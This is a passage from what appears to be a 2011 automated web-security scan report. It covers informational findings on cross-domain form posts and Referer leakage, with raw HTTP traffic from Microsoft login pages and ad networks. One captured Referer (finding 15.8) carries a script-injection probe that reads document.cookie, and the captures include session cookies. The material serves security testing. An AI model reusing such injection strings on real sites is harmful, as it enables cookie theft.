PPServer: PPV: 30 H: BAYIDSLGN1E56 V: 0
Date: Wed, 06 Jul 2011 11:21:04 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...
<body onload="javascript:DoSubmit();"><form name="fmHF" id="fmHF" action="https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033" method="post" target="_top"><input type="hidden" name="mspppostint" id="mspppostint" value="CeZJBLppJSTf0nRGcbVLfTH64e4BQKcCN+sGr3IfsQx0r0rtRVpcqOY5uQ9T8uC9M7LeAOhUNj20lBQ87DRIZyXqLjMRQwLV2xuDHb1Du3YZn3vEhlh+cWO2fpfHjq3yJUQmCJ0Up
...[SNIP]...

14.4. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The page contains a form which POSTs data to the domain accountservices.passport.net. The form contains the following fields:

Request

GET /resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951135 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2145
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
Set-Cookie: MSPBack=1309951135; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1O48 V: 0
Date: Wed, 06 Jul 2011 14:08:45 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...
<body onload="javascript:DoSubmit();"><form name="fmHF" id="fmHF" action="https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046" method="post" target="_top"><input type="hidden" name="mspppostint" id="mspppostint" value="CclpRiFnsre6ebJEDDCZLzIMlepyYzj8F8c2CvnnERgk2WZF8dJ4U/e0cE9J8sWwrnh8r/ohqTOcF/IqcOZ1nIfyNsbXqRBaXECDZOapZDbLZoizpS0g1hemOpQIJi9gB1+buPj/9
...[SNIP]...

15. Cross-domain Referer leakage
There are 29 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...
<td class="'+HIP.cssSet.cssCdHIPErrorImg+'" style="padding:0 4px 0 0;width:16px" ><img src="Https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.10/~/~/~/~/images/icon_err.gif'+i+'" /></td>
...[SNIP]...

15.2. https://accountservices.passport.net/uiresetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accountservices.passport.net
Path:   /uiresetpw.srf

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

POST /uiresetpw.srf?mkt=EN-US&lc=1033&id=75046 HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://login.live.com/resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&mkt=EN-US&lc=1033
Content-Length: 1592
Cache-Control: max-age=0
Origin: https://login.live.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

mspppostint=CcpFZF1pzFJJ35c22EExnN3DcZnRhoC6rxnyDE0w1z4L4rRIFCpyqXea8TPp7BQBhPwTisg4E%2BUO97pJuQcu5vYrjWFOFSp8G8Ba%2FSB6LD595uTlbLDuSzbJtTZEcIO%2BYxTR4dr0WyWrpjp5u6DEX6jSYwnJRudSTtiRd8rmgW2zSNkO72JClg
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 10386
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
PPServer: PPV: 30 H: BAYIDSPROF1D07 V: 0
Date: Wed, 06 Jul 2011 11:21:05 GMT
Connection: close

<!-- ServerInfo: BAYIDSPROF1D07 2011.06.02.00.31.45 Live1 ExclusiveNew LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<html dir="ltr"><head><meta http-equiv="Con
...[SNIP]...
<td colspan="3"><iframe src="https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="260" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe>
...[SNIP]...
<td valign="top" class="css9993"><iframe src="https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="90" height="390" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe>
...[SNIP]...
<td valign="top" class="css9995"><iframe src="https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="390" frameborder="0" scrolling="auto" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe>
...[SNIP]...
<td valign="top" colspan="3" class="css9996"><iframe src="https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="150" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe>
...[SNIP]...

15.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:55:05 GMT
Expires: Wed, 06 Jul 2011 11:55:05 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
JCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076"><img src="http://s0.2mdn.net/1420759/lmb_lre_PassStIreneThumbCNP15s40k_PresRed_729Pres12_0511_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

15.4. http://ad.doubleclick.net/adj/bzj.techflash/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bzj.techflash/

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /adj/bzj.techflash/;beh=;pos=but1;sz=125x125;tile=3;kw=seattle;ord=1309960845.184903.8040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 347
Date: Wed, 06 Jul 2011 14:00:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/y;242904168;0-0;1;40588219;3-125/125;42781672/42799459/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.seattleu.edu/scieng/comsci/Default.aspx?id=59018"><img src="http://s0.2mdn.net/viewad/2256299/SU-White-Tile.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.5. http://ad.doubleclick.net/adj/bzj.techflash/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bzj.techflash/

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /adj/bzj.techflash/;beh=;pos=but2;sz=125x125;tile=4;kw=seattle;ord=1309960845.184903.8040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 311
Date: Wed, 06 Jul 2011 14:00:49 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/b;237741487;0-0;1;40588219;3-125/125;36236341/36254219/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.bdo.com/library"><img src="http://s0.2mdn.net/viewad/2671922/BDO-100yrs.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.6. http://ad.doubleclick.net/adj/bzj.techflash/home_page

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bzj.techflash/home_page

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /adj/bzj.techflash/home_page;beh=;pos=but1;vs=commercial;sz=125x125;tile=3;kw=seattle;ord=1309960820.391379.6605? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 347
Date: Wed, 06 Jul 2011 14:00:24 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/d;242904168;0-0;1;40588225;3-125/125;42781672/42799459/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.seattleu.edu/scieng/comsci/Default.aspx?id=59018"><img src="http://s0.2mdn.net/viewad/2256299/SU-White-Tile.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.7. http://ad.doubleclick.net/adj/bzj.techflash/home_page

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bzj.techflash/home_page

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /adj/bzj.techflash/home_page;beh=;pos=but2;vs=commercial;sz=125x125;tile=4;kw=seattle;ord=1309960820.391379.6605? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 311
Date: Wed, 06 Jul 2011 14:00:24 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b3c/0/0/%2a/g;237741487;0-0;1;40588225;3-125/125;36236341/36254219/1;;~aopt=2/1/b1/0;~sscs=%3fhttp://www.bdo.com/library"><img src="http://s0.2mdn.net/viewad/2671922/BDO-100yrs.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.8. http://adonmax.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adonmax.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: adonmax.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:19:29 GMT
Server: Apache/2.2.19 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: id=604085l37; expires=Sat, 06-Aug-2011 14:19:29 GMT
Content-Length: 334
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=uft8">
<title></title>
</head>
<body>
       <a href="http://gevalia.com" target="_blank"><img src="/image/creative/20553859530/432300.gif" alt="" style="border:none" />
...[SNIP]...

15.9. http://bcp.crwdcntrl.net/px

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4 HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nC2STSgEcRjG%2F8KmbWZndtqZETdx1aacuXBAuzeKC0VOyldYp3FyEBcXxYGkpNxcfLSiFptyIeUsHLeURMR6fvYwv57363n%2Fb2uMMZlUR9aYivRPc37UjBnjNpi%2FX9AtJN5RPYLbJFi35D7JtRN8EOw7Ib5PyYsQZgnuCP4Qahs1KDjfBDeEFH7xNdrHMRrG6AOVE7w0wVJkorL7F7lJ8N83I1TXUbnKnou8iJw7i5GFmsD9ETUnxGxK2rAdkZ%2FLns4KlRnA6bwpVB9qmnYu6PaDAU7wJphlhnEeJycH%2F4mSZ4LzBEtSSe4ZsGdNC6e7obIT200h0Ys6pf2CvldGF%2Bi7R52rxDui8opgkfYiuWshiJiygF8jK%2FEU%2F1CwK1EM8wrMPAHsEixRWU%2FllmAlULs4rHMeHu3EeJGPqhLCPPe8ZE%2BOFR7TfoBDK8E9obZLiPPHTJ6VP7%2FnjlOd; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FEVf%2F%2F4ezrzAwMBr819uXDhJjEBb4tpuFgeEsA8N%2FEFcSQjNaTM%2F4zwhkfFkZAuY3MDAJfNtPrMI9RClkEfi2jVgTtxOnUFDFkDirBRXziFQoOZVIqyWnE6twGrG%2BvkKcG4X5u4k18QKxCi8Rq%2FAUcW6Uz2si1sRDxClMqKgjzuqEinriFDI4CX6fzczAoARUwsgI1cII1QISUAo7k41sVANYntGiAaL%2BC4QfqOLEDFfEaIkqqbXHFLdkWlUAyPjp6QhrwS5NhyiCiIedqcBtgsz%2FI%2FgkTyO7HhgAYNeDAgJsfAbE9dG4TQg7UwAyoQEtKFEV%2Be8qIBxIWnsUcFsj%2BL2NGW4NumSgSgxhX8iaXWRDRCA0QuEmQSIUSRMwDTCCI1hOvxy3swJ495FlqPeXEnwJQga3ZOAiZrJs1NojgdtQhf3N%2BJwjSjh0ueobyHKWm%2FU5vNnLP38vXnmF%2Fe24Xe5mfRa3pPeXdHySabgl5Qy34JYUVrPE62DvL%2Fl45YXV8JQGQdVM2HIBpLxSTP5OOJP5568jnF3DhDPwpZU3eCQ38BNOK27WC%2FHF2SLckqE9M%2FHpXI2nmBKuxC3pn3%2BUcMi5WW%2FHZ8Jh3JLxLLvxOawAt2Si5TnCpb%2F8DD7CURqoIoU32cWz7CEccWGqlYTDKfW%2BLGE3K1zCE15eL66DTciAmIDuFkhq52qdRFaBE6iihKdwVVHGLam4rI6w72X%2B7yemQtXGGxleL27gzuZeL27hlgQA%2FDTnsA%3D%3D; OAID=aa8272d1805895ab786afc266fb574e9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:22:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1170
Connection: close

<html><body><div><img src="https://ad.yieldmanager.com/pixel?id=1170133&t=2" width="1" height="1" /><img src="http://ads.adbrite.com/adserver/behavioral-data/8203?d=2723" width="1" height="1"><iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1"> </iframe>

<img src="http://ib.adnxs.com/seg?add=105966">
<img src="http://segments.adap.tv/data/?p=lotame&type=gif&audid=5606&add=true">
<!-- "Network Pixel" c/o "Lotame", segment: 'Tech Savvy' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag --><img src="http://osmdcs.interclick.com/pixel.aspx?dp=10E0B42F-121D-41E0-A8C4-A5963CAEC3B7&sid=2716">
<img src="http://segments.adap.tv/data/?p=lotame&type=gif&audid=2723&add=true">
<iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1"> </iframe>
...[SNIP]...

15.10. http://bp.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /?pixid=99012352 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Wed, 06 Jul 2011 15:39:03 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...

15.11. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
